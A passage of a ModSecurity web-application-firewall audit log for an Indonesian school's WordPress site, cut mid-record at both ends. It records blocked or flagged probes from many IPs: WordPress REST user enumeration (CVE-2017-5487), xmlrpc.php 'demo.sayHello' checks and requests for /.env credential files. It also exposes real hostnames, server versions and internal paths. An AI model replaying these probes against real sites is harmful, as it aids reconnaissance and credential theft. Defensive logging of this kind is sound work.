156.233.87.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --11c41e58-C-- demo.sayHello --11c41e58-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --11c41e58-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747571695516012 5934 (- - -) Stopwatch2: 1747571695516012 5934; combined=4126, p1=474, p2=3389, p3=32, p4=36, p5=116, sr=61, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11c41e58-Z-- --eb0bc635-A-- [18/May/2025:20:07:42 +0700] aCnbnvypzAd0elWOk7qLlgAAAA0 103.236.140.4 57812 103.236.140.4 8181 --eb0bc635-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.237.186.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.237.186.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eb0bc635-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb0bc635-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747573662777116 2739 (- - -) Stopwatch2: 1747573662777116 2739; combined=1363, p1=448, p2=875, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb0bc635-Z-- --b92d687b-A-- [18/May/2025:20:21:05 +0700] aCnewVewLfDrCkDGIGyq_wAAAM8 103.236.140.4 48188 103.236.140.4 8181 --b92d687b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.76.189.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.76.189.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b92d687b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b92d687b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747574465867409 2673 (- - -) Stopwatch2: 1747574465867409 2673; combined=1126, p1=348, p2=748, p3=0, p4=0, p5=30, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b92d687b-Z-- --84c98451-A-- [18/May/2025:20:22:19 +0700] aCnfC_ypzAd0elWOk7qRAgAAAAE 103.236.140.4 49596 103.236.140.4 8181 --84c98451-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --84c98451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84c98451-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747574539119811 2652 (- - -) Stopwatch2: 1747574539119811 2652; combined=1136, p1=400, p2=702, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84c98451-Z-- --aeaeb049-A-- [18/May/2025:20:22:26 +0700] aCnfEkPRqak7bVuUS6dztQAAAIo 103.236.140.4 49792 103.236.140.4 8181 --aeaeb049-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aeaeb049-C-- demo.sayHello --aeaeb049-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeaeb049-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747574546778881 13523 (- - -) Stopwatch2: 1747574546778881 13523; combined=19689, p1=650, p2=3615, p3=34, p4=67, p5=7675, sr=74, sw=49, l=0, gc=7599 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeaeb049-Z-- --b314f904-A-- [18/May/2025:20:31:11 +0700] aCnhHxir-GlPrFVVKe6RaQAAAFg 103.236.140.4 33732 103.236.140.4 8181 --b314f904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b314f904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b314f904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575071972501 3189 (- - -) Stopwatch2: 1747575071972501 3189; combined=1486, p1=523, p2=927, p3=0, p4=0, p5=35, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b314f904-Z-- --8240e16d-A-- [18/May/2025:20:31:20 +0700] aCnhKBir-GlPrFVVKe6RhwAAAFM 103.236.140.4 33932 103.236.140.4 8181 --8240e16d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8240e16d-C-- demo.sayHello --8240e16d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8240e16d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575080820278 6647 (- - -) Stopwatch2: 1747575080820278 6647; combined=4814, p1=597, p2=3984, p3=40, p4=47, p5=86, sr=72, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8240e16d-Z-- --0716a611-A-- [18/May/2025:20:34:49 +0700] aCnh-VewLfDrCkDGIGyxaAAAANc 103.236.140.4 38196 103.236.140.4 8181 --0716a611-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.128.227.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.128.227.125 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --0716a611-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0716a611-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747575289515475 840 (- - -) Stopwatch2: 1747575289515475 840; combined=378, p1=338, p2=0, p3=0, p4=0, p5=40, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0716a611-Z-- --c579c938-A-- [18/May/2025:20:34:54 +0700] aCnh_vypzAd0elWOk7qUtgAAAA8 103.236.140.4 38232 103.236.140.4 8181 --c579c938-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.128.227.125 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.128.227.125 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c579c938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c579c938-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747575294002771 828 (- - -) Stopwatch2: 1747575294002771 828; combined=383, p1=277, p2=0, p3=0, p4=0, p5=105, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c579c938-Z-- --387df515-A-- [18/May/2025:20:38:13 +0700] aCnixRir-GlPrFVVKe6TPwAAAEE 103.236.140.4 42766 103.236.140.4 8181 --387df515-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --387df515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --387df515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575493779381 3436 (- - -) Stopwatch2: 1747575493779381 3436; combined=1583, p1=475, p2=1079, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --387df515-Z-- --4ffdb272-A-- [18/May/2025:20:38:20 +0700] aCnizEPRqak7bVuUS6d4sgAAAIs 103.236.140.4 42970 103.236.140.4 8181 --4ffdb272-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ffdb272-C-- demo.sayHello --4ffdb272-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ffdb272-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575500837085 6058 (- - -) Stopwatch2: 1747575500837085 6058; combined=4816, p1=658, p2=3910, p3=38, p4=44, p5=98, sr=118, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ffdb272-Z-- --00835564-A-- [18/May/2025:20:45:33 +0700] aCnkfUPRqak7bVuUS6d7eAAAAII 103.236.140.4 54312 103.236.140.4 8181 --00835564-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00835564-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00835564-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575933559534 3050 (- - -) Stopwatch2: 1747575933559534 3050; combined=1383, p1=469, p2=882, p3=0, p4=0, p5=31, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00835564-Z-- --86eca174-A-- [18/May/2025:20:45:33 +0700] aCnkfUPRqak7bVuUS6d7eQAAAJM 103.236.140.4 54314 103.236.140.4 8181 --86eca174-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --86eca174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86eca174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575933773670 2080 (- - -) Stopwatch2: 1747575933773670 2080; combined=1094, p1=309, p2=746, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86eca174-Z-- --5a91ae20-A-- [18/May/2025:20:45:39 +0700] aCnkg0PRqak7bVuUS6d7jgAAAIA 103.236.140.4 54466 103.236.140.4 8181 --5a91ae20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5a91ae20-C-- demo.sayHello --5a91ae20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a91ae20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575939242891 5854 (- - -) Stopwatch2: 1747575939242891 5854; combined=4297, p1=546, p2=3519, p3=33, p4=36, p5=97, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a91ae20-Z-- --5bda6f1e-A-- [18/May/2025:20:45:39 +0700] aCnkgxir-GlPrFVVKe6WbgAAAFU 103.236.140.4 54468 103.236.140.4 8181 --5bda6f1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5bda6f1e-C-- demo.sayHello --5bda6f1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5bda6f1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747575939312167 3760 (- - -) Stopwatch2: 1747575939312167 3760; combined=2712, p1=453, p2=2113, p3=17, p4=17, p5=65, sr=72, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bda6f1e-Z-- --ab6b3460-A-- [18/May/2025:20:46:26 +0700] aCnksvypzAd0elWOk7qZJQAAAA4 103.236.140.4 55454 103.236.140.4 8181 --ab6b3460-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.43.8 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.43.8 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab6b3460-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6b3460-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747575986738734 2772 (- - -) Stopwatch2: 1747575986738734 2772; combined=1243, p1=523, p2=691, p3=0, p4=0, p5=29, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6b3460-Z-- --8d74cd08-A-- [18/May/2025:20:54:37 +0700] aCnmnUPRqak7bVuUS6d_FwAAAI8 103.236.140.4 39828 103.236.140.4 8181 --8d74cd08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d74cd08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d74cd08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747576477513049 3547 (- - -) Stopwatch2: 1747576477513049 3547; combined=1996, p1=588, p2=1374, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d74cd08-Z-- --247c8e3e-A-- [18/May/2025:20:54:45 +0700] aCnmpVewLfDrCkDGIGy4aAAAANc 103.236.140.4 39960 103.236.140.4 8181 --247c8e3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id 